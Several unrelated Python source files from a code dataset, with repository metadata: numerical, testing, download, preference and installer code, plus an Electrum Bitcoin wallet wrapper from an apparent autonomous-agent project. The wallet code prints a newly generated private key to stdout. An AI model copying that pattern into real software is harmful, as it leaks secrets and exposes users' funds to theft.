LL = L.values()
for i in Names:
l = L[i]
l.dtype = np.dtype(l.dtype.descr)
if i in renaming.keys():
for k in renaming[i].keys():
if k not in keycols:
renamecol(L[i], k, renaming[i][k])
l.sort(order = keycols)
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
assert len(commons) == 0, ('The following (non-keycol) column names '
        'appear in more than one array being merged:', str(commons))
Result = colstack([(L[Names[0]][keycols])[0:0]] +
[deletecols(L[k][0:0], keycols) \
for k in Names if deletecols(L[k][0:0], keycols) != None])
PL = powerlist(Names)
ToGet = utils.listunion([[p for p in PL if len(p) == k]
for k in range(1, len(Names))]) + [PL[-1]]
for I in ToGet[::-1]:
Ref = L[I[0]][keycols]
for j in I[1:]:
if len(Ref) > 0:
Ref = Ref[fast.recarrayisin(Ref, L[j][keycols], weak=True)]
else:
break
if len(Ref) > 0:
D = [fast.recarrayisin(L[j][keycols], Ref, weak=True) for j in I]
Ref0 = L[I[0]][keycols][D[0]]
Reps0 = np.append(np.append([-1],
(Ref0[1:] != Ref0[:-1]).nonzero()[0]),[len(Ref0)-1])
Reps0 = Reps0[1:] - Reps0[:-1]
NewRows = colstack([Ref0] +
[deletecols(L[j][D[i]], keycols).repeat(Reps0) if i > 0 else
deletecols(L[j][D[i]], keycols) for (i, j) in enumerate(I)
if deletecols(L[j][D[i]], keycols) != None])
for (i,j) in enumerate(I):
L[j] = L[j][np.invert(D[i])]
Result = rowstack([Result, NewRows], mode='nulls',
nullvals=nullvals)
return Result
def RenamingIsInCorrectFormat(renaming, L, Names=None):
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
return isinstance(renaming, dict) and \
set(renaming.keys()) <= set(Names) and \
all([isinstance(renaming[k],dict) and
set(renaming[k].keys()) <=
set(LL[Names.index(k)].dtype.names) for k in renaming.keys()])
def DEFAULT_RENAMER(L, Names=None):
"""
Renames overlapping column names of numpy ndarrays with structured dtypes
Rename the columns by using a simple convention:
* If `L` is a list, it will append the number in the list to the key
associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the overlapping
columns from that array.
Default renamer function used by :func:`tabular.spreadsheet.join`
**Parameters**
**L** : list or dictionary
Numpy recarrays with columns to be renamed.
**Returns**
**D** : dictionary of dictionaries
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
commons = Commons([l.dtype.names for l in LL])
D = {}
for (i,l) in zip(Names, LL):
d = {}
for c in commons:
if c in l.dtype.names:
d[c] = c + '_' + str(i)
if d:
D[i] = d
return D
def Commons(ListOfLists):
commons = []
for i in range(len(ListOfLists)):
for j in range(i+1, len(ListOfLists)):
commons.extend([l for l in ListOfLists[i] if l in ListOfLists[j]])
return commons
def powerlist(S):
if len(S) > 0:
Sp = powerlist(S[:-1])
return Sp + [x + [S[-1]] for x in Sp]
else:
return [[]]
def isunique(col):
[D,s] = fast.recarrayuniqify(col)
return len(D.nonzero()[0]) == len(col)
|
mit
| -489,199,996,321,512,960
| 34.931533
| 92
| 0.546152
| false
| 4.103149
| false
| false
| false
|
KiMiralles/Python-Learning
|
Computational Physics Newman/Book Resources/bulirsch.py
|
1
|
1824
|
from math import sin,pi
from numpy import empty,array,arange
from pylab import plot,show
g = 9.81
l = 0.1
theta0 = 179*pi/180
a = 0.0
b = 10.0
N = 100 # Number of "big steps"
H = (b-a)/N # Size of "big steps"
delta = 1e-8 # Required position accuracy per unit time
def f(r):
theta = r[0]
omega = r[1]
ftheta = omega
fomega = -(g/l)*sin(theta)
return array([ftheta,fomega],float)
tpoints = arange(a,b,H)
thetapoints = []
r = array([theta0,0.0],float)
# Do the "big steps" of size H
for t in tpoints:
thetapoints.append(r[0])
# Do one modified midpoint step to get things started
n = 1
r1 = r + 0.5*H*f(r)
r2 = r + H*f(r1)
# The array R1 stores the first row of the
# extrapolation table, which contains only the single
# modified midpoint estimate of the solution at the
# end of the interval
R1 = empty([1,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*H*f(r2))
# Now increase n until the required accuracy is reached
error = 2*H*delta
while error>H*delta:
n += 1
h = H/n
# Modified midpoint method
r1 = r + 0.5*h*f(r)
r2 = r + h*f(r1)
for i in range(n-1):
r1 += h*f(r2)
r2 += h*f(r1)
# Calculate extrapolation estimates. Arrays R1 and R2
# hold the two most recent lines of the table
R2 = R1
R1 = empty([n,2],float)
R1[0] = 0.5*(r1 + r2 + 0.5*h*f(r2))
for m in range(1,n):
epsilon = (R1[m-1]-R2[m-1])/((n/(n-1))**(2*m)-1)
R1[m] = R1[m-1] + epsilon
error = abs(epsilon[0])
# Set r equal to the most accurate estimate we have,
# before moving on to the next big step
r = R1[n-1]
# Plot the results
plot(tpoints,thetapoints)
plot(tpoints,thetapoints,"b.")
show()
|
gpl-3.0
| 7,120,225,636,442,674,000
| 23.648649
| 62
| 0.565241
| false
| 2.784733
| false
| false
| false
|
ESSS/pytest-regressions
|
src/pytest_regressions/data_regression.py
|
1
|
3451
|
from functools import partial
import yaml
from pytest_regressions.common import Path, check_text_files, perform_regression_check
class DataRegressionFixture:
"""
Implementation of `data_regression` fixture.
"""
def __init__(self, datadir, original_datadir, request):
"""
:type datadir: Path
:type original_datadir: Path
:type request: FixtureRequest
"""
self.request = request
self.datadir = datadir
self.original_datadir = original_datadir
self.force_regen = False
def check(self, data_dict, basename=None, fullpath=None):
"""
Checks the given dict against a previously recorded version, or generate a new file.
:param dict data_dict: any yaml serializable dict.
:param str basename: basename of the file to test/record. If not given the name
of the test is used.
Use either `basename` or `fullpath`.
:param str fullpath: complete path to use as a reference file. This option
will ignore ``datadir`` fixture when reading *expected* files but will still use it to
write *obtained* files. Useful if a reference file is located in the session data dir for example.
``basename`` and ``fullpath`` are exclusive.
"""
__tracebackhide__ = True
def dump(filename):
"""Dump dict contents to the given filename"""
import yaml
dumped_str = yaml.dump_all(
[data_dict],
Dumper=RegressionYamlDumper,
default_flow_style=False,
allow_unicode=True,
indent=2,
encoding="utf-8",
)
with filename.open("wb") as f:
f.write(dumped_str)
perform_regression_check(
datadir=self.datadir,
original_datadir=self.original_datadir,
request=self.request,
check_fn=partial(check_text_files, encoding="UTF-8"),
dump_fn=dump,
extension=".yml",
basename=basename,
fullpath=fullpath,
force_regen=self.force_regen,
)
# non-PEP 8 alias used internally at ESSS
Check = check
class RegressionYamlDumper(yaml.SafeDumper):
"""
Custom YAML dumper aimed for regression testing. Differences to usual YAML dumper:
* Doesn't support aliases, as they produce confusing results on regression tests. The most
      definitive way to get rid of YAML aliases in the dump is to create a specialization that
      never allows aliases, as there isn't an argument that offers the same guarantee
(see http://pyyaml.org/ticket/91).
"""
def ignore_aliases(self, data):
return True
@classmethod
def add_custom_yaml_representer(cls, data_type, representer_fn):
"""
Add custom representer to regression YAML dumper. It is polymorphic, so it works also for
subclasses of `data_type`.
:param type data_type: Type of objects.
:param callable representer_fn: Function that receives ``(dumper, data)`` type as
            argument and must return a YAML-convertible representation.
"""
# Use multi-representer instead of simple-representer because it supports polymorphism.
yaml.add_multi_representer(
data_type, multi_representer=representer_fn, Dumper=cls
)
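# Illustrative usage sketch, not part of the original module; the test name and
# the dict contents below are made up. On the first run `check()` writes a
# `.yml` file named after the test into the data directory; later runs compare
# against that file and fail on any difference (pytest's --force-regen updates it).
#
#     def test_user_defaults(data_regression):
#         data_regression.check({"name": "John Doe", "age": 33})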
|
mit
| 7,882,442,899,186,516,000
| 33.858586
| 110
| 0.622718
| false
| 4.487646
| false
| false
| false
|
Skynet2-0/Skynet2.0
|
agent/Wallet.py
|
1
|
4754
|
"""
Created on Apr 26, 2016
@author: niels
"""
from subprocess import PIPE, STDOUT
from BogusFormBuilder import BogusFormBuilder
import subprocess
import re
import os
import time
import sys
import pexpect
class Wallet(object):
"""
    This class will manage the bitcoins going in and out of the agent.
"""
def __init__(self):
""" Constructor. """
output = pexpect.run('electrum listaddresses')
print(output)
        pattern = re.compile(r'\[\W*"[A-z0-9]+"\W*\]') #the specific output for electrum if 1 address exists
print(pattern.search(output))
if(pattern.search(output)):
#if a wallet exists, initialize that one
print('using already existing wallet')
else:
self._create_wallet()
subprocess.call(['electrum', 'daemon', 'start'])
def _answer_prompt(self, child, answer):
"""
Wait for a prompt, then send the answer. Answering with '' is the same as no answer
child -- a result from pexpect.spawn and is thus of the pexpect.spawn class.
"""
#wait for prompt, then send answer
child.waitnoecho()
child.sendline(answer)
try:
child.read()
except:
            pass #sometimes no output is generated, and EOF would crash read...
def _create_wallet(self):
print('did not find an existing wallet, creating a new one')
        #ensure the daemon is stopped, as this causes path errors (mostly useful for development)
pexpect.run('electrum daemon stop')
#build a new wallet if no wallet yet exists
walletpair=str(subprocess.check_output('python addrgen/addrgen.py',shell=True))
walletpair = re.split('\W+', walletpair)
self.address = walletpair[1]
self.privkey = walletpair[2]
print('created a wallet with address \''+self.address+'\' and privatekey \''+self.privkey+'\'')
child = pexpect.spawn('electrum', ['restore', self.privkey])
#respectively: use default password, use default fee (0.002), use default gap limit and give seed
self._answer_prompt(child, '')
        #check if the wallet was created successfully
command = """electrum listaddresses"""
output = pexpect.run(command)
walletFinder = re.compile(r'\[\W*"([A-z0-9]+)"\W*\]')
result = walletFinder.search(output)
#This horrible feedback loop is here due to a quirk of electrum.
#Needs refactoring, but do not refactor without extensive testing (i.e. multiple vps all from clean install)
        #Because electrum behaviour right after startup tends to differ from server to server (I suspect something to do with specs)
try:
            print(result.group(1))
return result.group(1)
except:
return self._create_wallet()
# def __del__(self):
# '''
# clear up the electrum service
# '''
# subprocess.call(['electrum', 'daemon', 'stop'])
def balance(self):
"""
Return the balance of the Btc wallet (i.e. confirmed balance+unconfirmed balance).
"""
balancesheet = str(subprocess.check_output(['electrum', 'getbalance']))
return self.calculateBalance(balancesheet)
def calculateBalance(self, balancesheet):
"""
Given the output of electrum getbalance
calculates the actual balance.
"""
confirmedBalance = re.search('"confirmed": "([0-9.\-]+)"', balancesheet)
unconfirmedBalance = re.search('"unconfirmed": "([0-9.\-]+)"', balancesheet)
sum = 0.0
if confirmedBalance:
sum+=float(confirmedBalance.group(1))
if unconfirmedBalance:
sum+=float(unconfirmedBalance.group(1))
return sum
def canPay(self, amount, fee):
return float(amount)+float(fee)<=self.balance()
def payToAutomatically(self, address, amount):
"""
Make a payment using an automatically calculated fee.
address -- The address to transfer to.
amount -- The amount to transfer.
"""
if self.canPay(amount,'0.0'):
payment = str(subprocess.check_output(['electrum', 'payto', address, amount]))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
return True
return False
def send_everything_to(self, address):
"""
Transfers all available funds in the wallet to the specified address
address -- The address as string to transfer to
"""
payment = str(subprocess.check_output(['electrum', 'payto', str(address), '!']))
#filter out the hex code from the payment and broadcast this
hex = re.search('hex": "([A-z0-9]+)"', payment).group(1)
subprocess.call(['electrum', 'broadcast', hex])
def payTo(self, address, fee, amount):
"""
        If funds allow, transfer amount in Btc to address, with a fee for the
        processor.
address -- The address to pay to.
fee -- The fee to pay.
amount -- The amount to transfer.
"""
if self.canPay(amount, fee):
print(str(subprocess.call(['electrum', 'payto', '-f', fee, address, amount])))
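# Illustrative usage sketch, not part of the original module; it assumes an
# `electrum` binary on PATH and uses a placeholder destination address.
#
#     wallet = Wallet()                       # reuse or create an Electrum wallet
#     print(wallet.balance())
#     if wallet.canPay('0.01', '0.002'):
#         wallet.payTo('<destination address>', '0.002', '0.01')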
|
gpl-3.0
| 8,826,590,145,078,224,000
| 30.071895
| 126
| 0.689314
| false
| 3.371631
| false
| false
| false
|
hkkwok/MachOTool
|
utils/progress_indicator.py
|
1
|
1267
|
import sys
import datetime
class ProgressIndicator(object):
ENABLED = True
RECORDS = list()
def __init__(self, prompt, frequency):
self._display(prompt)
self._record(prompt + 'start')
self.prompt = prompt
self.frequency = frequency
self.count = 0
def click(self):
if (self.count % self.frequency) == 0:
self._display('.')
self.count += 1
def done(self):
self._display('\n')
self._record(self.prompt + 'done (%d entries)' % self.count)
@classmethod
def display(cls, fmt, *args):
if cls.ENABLED:
if len(args) == 0:
output = fmt
else:
output = fmt % tuple(args)
cls._display(output)
cls._record(output)
@classmethod
def _display(cls, output):
if cls.ENABLED:
sys.stdout.write(output)
sys.stdout.flush()
@classmethod
def _record(cls, event):
cls.RECORDS.append((datetime.datetime.now(), event))
@classmethod
def clear(cls):
cls.RECORDS = list()
@classmethod
def dump_records(cls):
for (timestamp, event) in cls.RECORDS:
            print('%s: %s' % (str(timestamp), event))
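# Illustrative usage sketch, not part of the original module: print a dot every
# 100 clicks while looping, then dump the timing records.
if __name__ == '__main__':
    progress = ProgressIndicator('processing entries', 100)
    for _ in range(1000):
        progress.click()
    progress.done()
    ProgressIndicator.dump_records()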
|
apache-2.0
| 1,150,852,479,338,861,800
| 23.365385
| 68
| 0.539069
| false
| 3.996845
| false
| false
| false
|
minzhangcheng/MPL
|
MPL/Network/Download.py
|
1
|
3810
|
# ############################################################################
#
# Copyright (C) 2015 Minzhang Cheng
# Contact: minzhangcheng@gmail.com
#
# This file is part of the Minzhang's Python Library, a Python library with many utils by Minzhang Cheng.
#
# GNU Lesser General Public License Usage
# This file may be used under the terms of the GNU Lesser General Public
# License version 3 as published by the Free Software Foundation and
# appearing in the file LICENSE included in the packaging of this file.
# Please review the following information to ensure the GNU Lesser
# General Public License version 3 requirements will be met:
# http://www.gnu.org/licenses/gpl-3.0.html
#
# ############################################################################
import __future__
import ftplib
import requests
def ftpDownload(url, path, filename='', user='anonymous', password=''):
"""
##############################################################################
#
# ftpDownload(url, URL of ftp, pointing to a file
# path, The path to store downloaded file
# filename='', Filename, default to use the original name from ftp server
# user='anonymous', FTP user, default to use anonymous mode
# password='') FTP password, default to use anonymous mode
#
# Download one file from ftp server, with url like
# [ftp://][user:password]@ftphost[:port]/[path/]filename
#
##############################################################################
"""
url = url.strip(' \t\n')
if url[:6] == 'ftp://':
url = url[6:]
at = url.find('@')
if at >= 0:
(ftpUser, host) = url.rsplit('@', 1)
user = ftpUser
sep = ftpUser.find(':')
if sep >= 0:
(user, password) = ftpUser.split(':', 1)
else:
host = url
(host, ftpPath) = host.split('/', 1)
host = host.split(':')
if len(host) == 2:
port = host[1]
host = host[0]
else:
port = 21
host = host[0]
sep = ftpPath.find('/')
if sep >= 0:
(ftpPath, name) = ftpPath.rsplit('/', 1)
else:
name = ftpPath
ftpPath = ''
if path[-1] != '/':
path += '/'
if filename == '':
filename = path + name
else:
filename = path + filename
ftp = ftplib.FTP()
ftp.connect(host, port)
ftp.login(user, password)
if ftpPath != '':
ftp.cwd(ftpPath)
outFile = open(filename, 'wb')
ftp.retrbinary('RETR %s' % name, outFile.write)
ftp.quit()
outFile.close()
return True
def httpDownload(url, path, filename=''):
"""
Download one file from http server.
httpDownload(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name
from http server
"""
if path[-1] not in '/':
path += '/'
if len(filename) == 0:
file = url.rsplit('/', 1)[-1]
file = path + file
else:
file = path + filename
req = requests.get(url)
outFile = open(file, 'wb')
outFile.write(req.content)
outFile.close()
return True
def download(url, path, filename=''):
"""
Download one file from remote server.
download(url, URL of a file
path, The path to store downloaded file
filename='') Filename, default to use the original name from
remote server
"""
if url[:6] == 'ftp://':
return ftpDownload(url, path, filename)
else:
return httpDownload(url, path, filename)
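# Illustrative usage sketch, not part of the original module; the URLs and the
# destination directory below are placeholders, not real endpoints.
if __name__ == '__main__':
    download('http://example.com/files/readme.txt', '/tmp')
    download('ftp://user:password@example.com/pub/data.csv', '/tmp', 'renamed.csv')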
|
lgpl-3.0
| 6,221,154,197,156,404,000
| 30.237705
| 105
| 0.505512
| false
| 4.339408
| false
| false
| false
|
debugger06/MiroX
|
linux/plat/options.py
|
1
|
3688
|
# Miro - an RSS based video player application
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010, 2011
# Participatory Culture Foundation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# In addition, as a special exception, the copyright holders give
# permission to link the code of portions of this program with the OpenSSL
# library.
#
# You must obey the GNU General Public License in all respects for all of
# the code used other than OpenSSL. If you modify file(s) with this
# exception, you may extend this exception to your version of the file(s),
# but you are not obligated to do so. If you do not wish to do so, delete
# this exception statement from your version. If you delete this exception
# statement from all source files in the program, then also delete it here.
"""miro.plat.options -- Holds platform-specific command line options.
Most/all of these are set in the miro.real script. The values here are
hopefully sane defaults.
"""
# these have no related prefs
shouldSyncX = False
frontend = 'html'
themeName = None
gconf_name = None
user_home = "~/"
override_dimensions = None
from miro.prefs import Pref
class LinuxPref(Pref):
def __init__(self, key, default, alias, helptext):
Pref.__init__(self, key, default, False, None, None)
self.alias = alias
self.helptext = helptext
FFMPEG_BINARY = LinuxPref(
key="ffmpegBinary",
default="/usr/bin/ffmpeg",
alias="ffmpeg",
helptext="Absolute path for ffmpeg binary.")
FFMPEG2THEORA_BINARY = LinuxPref(
key="ffmpeg2TheoraBinary",
default="/usr/bin/ffmpeg2theora",
alias="ffmpeg2theora",
helptext="Absolute path for ffmpeg2theora binary.")
FIRST_TIME = LinuxPref(
key="startupTasksDone",
default=True,
alias="firsttimestartup",
helptext="If False, Miro shows first time startup dialog.")
USE_RENDERER = LinuxPref(
key="useRenderer",
default=u"gstreamer",
alias="renderer",
helptext="Which renderer to use. (gstreamer, ...)")
GSTREAMER_IMAGESINK = LinuxPref(
key="DefaultGstreamerImagesink",
default="gconfvideosink",
alias="gstreamer-imagesink",
helptext=("Which GStreamer image sink to use for video. "
"(autovideosink, ximagesink, xvimagesink, gconfvideosink, ...)"))
GSTREAMER_AUDIOSINK = LinuxPref(
key="DefaultGstreamerAudiosink",
default="gconfaudiosink",
alias="gstreamer-audiosink",
helptext=("Which GStreamer sink to use for audio. "
"(autoaudiosink, osssink, alsasink, gconfaudiosink, ...)"))
SHOW_TRAYICON = Pref(
key="showTrayicon",
default=True,
platformSpecific=False)
WINDOWS_ICON = Pref(
key='windowsIcon',
default=None,
# this is platform specific, but if we set this to True then it
# won't look up the value in the theme's app.config file
platformSpecific=False)
# build a lookup for preferences by alias
PREFERENCES = {}
for mem in dir():
p = locals()[mem]
if isinstance(p, Pref) and hasattr(p, "alias"):
PREFERENCES[p.alias] = p
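# Illustrative sketch, not part of the original module: the PREFERENCES table
# maps command line aliases back to their Pref objects, e.g.
#   PREFERENCES['renderer'].key   == 'useRenderer'
#   PREFERENCES['ffmpeg'].default == '/usr/bin/ffmpeg'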
|
gpl-2.0
| 1,548,895,991,307,455,500
| 33.46729
| 79
| 0.714208
| false
| 3.666004
| false
| false
| false
|
lingmann/dcos
|
dcos_installer/test_backend.py
|
1
|
12788
|
import json
import os
import subprocess
import uuid
import passlib.hash
import pytest
import gen
import gen.build_deploy.aws
import release
from dcos_installer import backend
from dcos_installer.config import Config, make_default_config_if_needed, to_config
os.environ["BOOTSTRAP_ID"] = "12345"
@pytest.fixture(scope='module')
def config():
if not os.path.exists('dcos-release.config.yaml'):
pytest.skip("Skipping because there is no configuration in dcos-release.config.yaml")
return release.load_config('dcos-release.config.yaml')
@pytest.fixture(scope='module')
def config_testing(config):
if 'testing' not in config:
pytest.skip("Skipped because there is no `testing` configuration in dcos-release.config.yaml")
return config['testing']
@pytest.fixture(scope='module')
def config_aws(config_testing):
if 'aws' not in config_testing:
pytest.skip("Skipped because there is no `testing.aws` configuration in dcos-release.config.yaml")
return config_testing['aws']
def test_password_hash():
    """Tests that the password hashing method creates a hash that verifies against the password
"""
password = 'DcosTestingPassword!@#'
# only reads from STDOUT
hash_pw = subprocess.check_output(['dcos_installer', '--hash-password', password])
print(hash_pw)
hash_pw = hash_pw.decode('ascii').strip('\n')
assert passlib.hash.sha512_crypt.verify(password, hash_pw), 'Hash does not match password'
def test_set_superuser_password(tmpdir):
    """Test that --set-superuser-password works"""
with tmpdir.as_cwd():
tmpdir.join('genconf').ensure(dir=True)
# TODO(cmaloney): Add tests for the behavior around a non-existent config.yaml
# Setting in a non-empty config.yaml which has no password set
make_default_config_if_needed('genconf/config.yaml')
assert 'superuser_password_hash' not in Config('genconf/config.yaml').config
# Set the password
create_fake_build_artifacts(tmpdir)
subprocess.check_call(['dcos_installer', '--set-superuser-password', 'foo'], cwd=str(tmpdir))
# Check that config.yaml has the password set
config = Config('genconf/config.yaml')
assert passlib.hash.sha512_crypt.verify('foo', config['superuser_password_hash'])
def test_generate_node_upgrade_script(tmpdir, monkeypatch):
upgrade_config = """
---
# The name of your DC/OS cluster. Visible in the DC/OS user interface.
cluster_name: 'DC/OS'
master_discovery: static
exhibitor_storage_backend: 'static'
resolvers:
- 8.8.8.8
- 8.8.4.4
ssh_port: 22
process_timeout: 10000
bootstrap_url: file:///opt/dcos_install_tmp
master_list: ['10.0.0.1', '10.0.0.2', '10.0.0.5']
"""
monkeypatch.setenv('BOOTSTRAP_VARIANT', '')
create_config(upgrade_config, tmpdir)
create_fake_build_artifacts(tmpdir)
output = subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script', 'fake'], cwd=str(tmpdir))
assert output.decode('utf-8').splitlines()[-1].split("Node upgrade script URL: ", 1)[1]\
.endswith("dcos_node_upgrade.sh")
try:
subprocess.check_output(['dcos_installer', '--generate-node-upgrade-script'], cwd=str(tmpdir))
except subprocess.CalledProcessError as e:
print(e.output)
assert e.output.decode('ascii') == "Must provide the version of the cluster upgrading from\n"
else:
raise Exception("Test passed, this should not pass without specifying a version number")
def test_version(monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'some-variant')
version_data = subprocess.check_output(['dcos_installer', '--version']).decode()
assert json.loads(version_data) == {
'version': '1.10.0-beta2',
'variant': 'some-variant'
}
def test_good_create_config_from_post(tmpdir):
"""
Test that it creates the config
"""
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
temp_ip_detect_path = workspace + '/ip-detect'
f = open(temp_ip_detect_path, "w")
f.write("#/bin/bash foo")
good_post_data = {
"agent_list": ["10.0.0.2"],
"master_list": ["10.0.0.1"],
"cluster_name": "Good Test",
"resolvers": ["4.4.4.4"],
"ip_detect_filename": temp_ip_detect_path
}
expected_good_messages = {}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=good_post_data,
config_path=temp_config_path)
assert messages == expected_good_messages
def test_bad_create_config_from_post(tmpdir):
# Create a temp config
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
bad_post_data = {
"agent_list": "foo",
"master_list": ["foo"],
}
expected_bad_messages = {
"agent_list": "Must be a JSON formatted list, but couldn't be parsed the given value `foo` as "
"one because of: Expecting value: line 1 column 1 (char 0)",
"master_list": 'Invalid IPv4 addresses in list: foo',
}
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=bad_post_data,
config_path=temp_config_path)
assert messages == expected_bad_messages
def test_do_validate_config(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
# Create a temp config
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
temp_config_path = str(genconf_dir.join('config.yaml'))
    # Initialize with defaults
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
expected_output = {
'ip_detect_contents': 'ip-detect script `genconf/ip-detect` must exist',
'ssh_user': 'Must set ssh_user, no way to calculate value.',
'master_list': 'Must set master_list, no way to calculate value.',
'ssh_key_path': 'could not find ssh private key: genconf/ssh_key'
}
with tmpdir.as_cwd():
assert Config(config_path='genconf/config.yaml').do_validate(include_ssh=True) == expected_output
def test_get_config(tmpdir):
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
expected_data = {
'cluster_name': 'DC/OS',
'master_discovery': 'static',
'exhibitor_storage_backend': 'static',
'resolvers': ['8.8.8.8', '8.8.4.4'],
'ssh_port': 22,
'process_timeout': 10000,
'bootstrap_url': 'file:///opt/dcos_install_tmp'
}
make_default_config_if_needed(temp_config_path)
config = Config(temp_config_path)
assert expected_data == config.config
def test_determine_config_type(tmpdir):
# Ensure the default created config is of simple type
workspace = tmpdir.strpath
temp_config_path = workspace + '/config.yaml'
make_default_config_if_needed(temp_config_path)
got_output = backend.determine_config_type(config_path=temp_config_path)
expected_output = {
'message': '',
'type': 'minimal',
}
assert got_output == expected_output
def test_success():
mock_config = to_config({
'master_list': ['10.0.0.1', '10.0.0.2', '10.0.0.5'],
'agent_list': ['10.0.0.3', '10.0.0.4']
})
expected_output = {
"success": "http://10.0.0.1",
"master_count": 3,
"agent_count": 2
}
expected_output_bad = {
"success": "",
"master_count": 0,
"agent_count": 0
}
got_output, code = backend.success(mock_config)
mock_config.update({'master_list': '', 'agent_list': ''})
bad_out, bad_code = backend.success(mock_config)
assert got_output == expected_output
assert code == 200
assert bad_out == expected_output_bad
assert bad_code == 400
def test_accept_overrides_for_undefined_config_params(tmpdir):
temp_config_path = tmpdir.strpath + '/config.yaml'
param = ('fake_test_param_name', 'fake_test_param_value')
make_default_config_if_needed(temp_config_path)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
messages = backend.create_config_from_post(
post_data=dict([param]),
config_path=temp_config_path)
assert not messages, "unexpected validation error: {}".format(messages)
assert Config(config_path=temp_config_path)[param[0]] == param[1]
simple_full_config = """---
cluster_name: DC/OS
master_discovery: static
exhibitor_storage_backend: static
master_list:
- 127.0.0.1
bootstrap_url: http://example.com
"""
def test_do_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(simple_full_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_configure(config_path='genconf/config.yaml') == 0
aws_base_config = """---
# NOTE: Taking advantage of what isn't talked about not being validated so we don't need valid AWS /
# s3 credentials in this configuration.
aws_template_storage_bucket: psychic
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_region_name: us-west-2
aws_template_upload: false
"""
def test_do_aws_configure(tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
create_config(aws_base_config, tmpdir)
create_fake_build_artifacts(tmpdir)
with tmpdir.as_cwd():
assert backend.do_aws_cf_configure() == 0
valid_storage_config = """---
master_list:
- 127.0.0.1
aws_template_storage_access_key_id: {key_id}
aws_template_storage_bucket: {bucket}
aws_template_storage_bucket_path: mofo-the-gorilla
aws_template_storage_secret_access_key: {access_key}
aws_template_upload: true
"""
def test_do_aws_cf_configure_valid_storage_config(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
# TODO: add an assertion that the config that was resolved inside do_aws_cf_configure
# ended up with the correct region where the above testing bucket was created.
def test_override_aws_template_storage_region_name(config_aws, tmpdir, monkeypatch):
bucket = str(uuid.uuid4())
config_str = valid_storage_config.format(
key_id=config_aws["access_key_id"],
bucket=bucket,
access_key=config_aws["secret_access_key"])
config_str += '\naws_template_storage_region_name: {}'.format(config_aws['region_name'])
assert aws_cf_configure(bucket, config_str, config_aws, tmpdir, monkeypatch) == 0
def aws_cf_configure(s3_bucket_name, config, config_aws, tmpdir, monkeypatch):
monkeypatch.setenv('BOOTSTRAP_VARIANT', 'test_variant')
session = gen.build_deploy.aws.get_test_session(config_aws)
s3 = session.resource('s3')
s3_bucket = s3.Bucket(s3_bucket_name)
s3_bucket.create(CreateBucketConfiguration={'LocationConstraint': config_aws['region_name']})
create_config(config, tmpdir)
create_fake_build_artifacts(tmpdir)
try:
with tmpdir.as_cwd():
return backend.do_aws_cf_configure()
finally:
objects = [{'Key': o.key} for o in s3_bucket.objects.all()]
s3_bucket.delete_objects(Delete={'Objects': objects})
s3_bucket.delete()
def create_config(config_str, tmpdir):
genconf_dir = tmpdir.join('genconf')
genconf_dir.ensure(dir=True)
config_path = genconf_dir.join('config.yaml')
config_path.write(config_str)
genconf_dir.join('ip-detect').write('#!/bin/bash\necho 127.0.0.1')
def create_fake_build_artifacts(tmpdir):
artifact_dir = tmpdir.join('artifacts/bootstrap')
artifact_dir.ensure(dir=True)
artifact_dir.join('12345.bootstrap.tar.xz').write('contents_of_bootstrap', ensure=True)
artifact_dir.join('12345.active.json').write('["package--version"]', ensure=True)
artifact_dir.join('test_variant.bootstrap.latest').write("12345")
tmpdir.join('artifacts/complete/test_variant.complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/complete/complete.latest.json').write(
'{"bootstrap": "12345", "packages": ["package--version"]}',
ensure=True,
)
tmpdir.join('artifacts/packages/package/package--version.tar.xz').write('contents_of_package', ensure=True)
|
apache-2.0
| -2,982,937,157,660,341,000
| 33.562162
| 115
| 0.665077
| false
| 3.474056
| true
| false
| false
|
adrianbeloqui/Python
|
nested_lists.py
|
1
|
1675
|
